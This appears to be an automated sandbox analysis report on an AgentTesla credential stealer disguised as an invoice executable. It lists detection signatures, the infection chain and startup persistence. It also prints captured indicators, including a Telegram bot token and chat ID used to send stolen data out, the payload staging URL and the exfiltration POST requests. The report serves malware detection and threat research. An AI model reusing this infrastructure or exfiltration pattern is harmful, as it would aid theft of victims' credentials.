Windows Analysis Report
Proforma Invoice.scr.exe

Overview

General Information

Sample name: Proforma Invoice.scr.exe
Analysis ID: 1545982
MD5: 3efcf6123cc2697d54be8e8d17f70eb6
SHA1: 194d4304e6fbea7bcc5203d9f5dd7c0883277fb1
SHA256: a05acadb64d5923e931a42aecca755b6a160b39f96ec1bff8611cd5116b4c926
Tags: exe, user-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Proforma Invoice.scr.exe (PID: 4000 cmdline: "C:\Users\user\Desktop\Proforma Invoice.scr.exe" MD5: 3EFCF6123CC2697D54BE8E8D17F70EB6)
    • InstallUtil.exe (PID: 3412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 2620 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • EncoderFallback.exe (PID: 6828 cmdline: "C:\Users\user\AppData\Roaming\EncoderFallback.exe" MD5: 3EFCF6123CC2697D54BE8E8D17F70EB6)
      • InstallUtil.exe (PID: 5868 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendMessage?chat_id=7068829394"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000003.00000002.2755078286.00000000028F8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000003.00000002.2755078286.00000000028F8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0.2.Proforma Invoice.scr.exe.6430000.13.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | Strings:
  • 0x3566a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x356dc:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x35766:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x357f8:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x35862:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x358d4:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3596a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x359fa:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                      System Summary

                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs" , ProcessId: 2620, ProcessName: wscript.exe
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs" , ProcessId: 2620, ProcessName: wscript.exe

                      Data Obfuscation

                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Proforma Invoice.scr.exe, ProcessId: 4000, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T11:14:22.467203+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.6 | 49818 | TCP
2024-10-31T11:14:51.363526+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.6 | 51758 | TCP
2024-10-31T11:14:34.440817+0100 | 2851779 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49879 | 149.154.167.220 | 443 | TCP
2024-10-31T11:14:58.092083+0100 | 2851779 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 51775 | 149.154.167.220 | 443 | TCP
2024-10-31T11:14:34.440817+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49879 | 149.154.167.220 | 443 | TCP
2024-10-31T11:14:36.494538+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49890 | 149.154.167.220 | 443 | TCP
2024-10-31T11:14:58.092083+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 51775 | 149.154.167.220 | 443 | TCP
2024-10-31T11:14:59.486489+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 51776 | 149.154.167.220 | 443 | TCP

                      AV Detection

                      Source: Proforma Invoice.scr.exeAvira: detected
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeAvira: detection malicious, Label: HEUR/AGEN.1308518
                      Source: 3.2.InstallUtil.exe.340000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendMessage?chat_id=7068829394"}
                      Source: InstallUtil.exe.5868.7.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendMessage"}
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeReversingLabs: Detection: 60%
                      Source: Proforma Invoice.scr.exeReversingLabs: Detection: 60%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeJoe Sandbox ML: detected
                      Source: Proforma Invoice.scr.exeJoe Sandbox ML: detected
                      Source: Proforma Invoice.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 173.237.185.182:443 -> 192.168.2.6:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49841 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49879 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 173.237.185.182:443 -> 192.168.2.6:49910 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:51774 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:51775 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:51776 version: TLS 1.2
                      Source: Proforma Invoice.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003578000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003633000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003C69000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Proforma Invoice.scr.exe, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003578000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003633000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003C69000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 4x nop then jmp 05D3A58Fh6_2_05D3A61A
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 4x nop then jmp 05D3A58Fh6_2_05D3A2C0
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 4x nop then jmp 05D3A58Fh6_2_05D3A2B0

                      Networking

                      Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.6:49879 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.6:49879 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.6:49890 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.6:51776 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.6:51775 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.6:51775 -> 149.154.167.220:443
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /wp-includes/Hjewct.vdf HTTP/1.1Host: geocs.mxConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf97349026ea0Host: api.telegram.orgContent-Length: 981Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf98afee4d99aHost: api.telegram.orgContent-Length: 918Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf973572514ecHost: api.telegram.orgContent-Length: 981Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf9857b3d199bHost: api.telegram.orgContent-Length: 918Expect: 100-continue
                      Source: Joe Sandbox ViewIP Address: 173.237.185.182 173.237.185.182
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.6:49818
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.6:51758
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: geocs.mx
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf97349026ea0Host: api.telegram.orgContent-Length: 981Expect: 100-continueConnection: Keep-Alive
                      Source: InstallUtil.exe, 00000003.00000002.2755078286.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.000000000296B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.00000000028C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000294D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002571000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.0000000002871000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000284C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.0000000002871000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000284C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: InstallUtil.exe, 00000003.00000002.2755078286.0000000002871000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000284C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: InstallUtil.exe, 00000003.00000002.2755078286.0000000002871000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000284C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: InstallUtil.exe, 00000003.00000002.2755078286.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.000000000296B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.00000000028C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000294D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.0000000002871000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000284C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/
                      Source: InstallUtil.exe, 00000003.00000002.2755078286.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.000000000296B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.00000000028C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000294D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002571000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://geocs.mx
                      Source: Proforma Invoice.scr.exe, EncoderFallback.exe.0.drString found in binary or memory: https://geocs.mx/wp-includes/Hjewct.vdf
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002618000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002C37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: unknown | HTTPS traffic detected: 173.237.185.182:443 -> 192.168.2.6:49737 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49841 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49879 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 173.237.185.182:443 -> 192.168.2.6:49910 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:51774 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:51775 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:51776 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Window created: window name: CLIPBRDWNDCLASS

                      System Summary

                      Source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                      Source: 6.2.EncoderFallback.exe.3cf5570.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                      Source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                      Source: 3.2.InstallUtil.exe.340000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
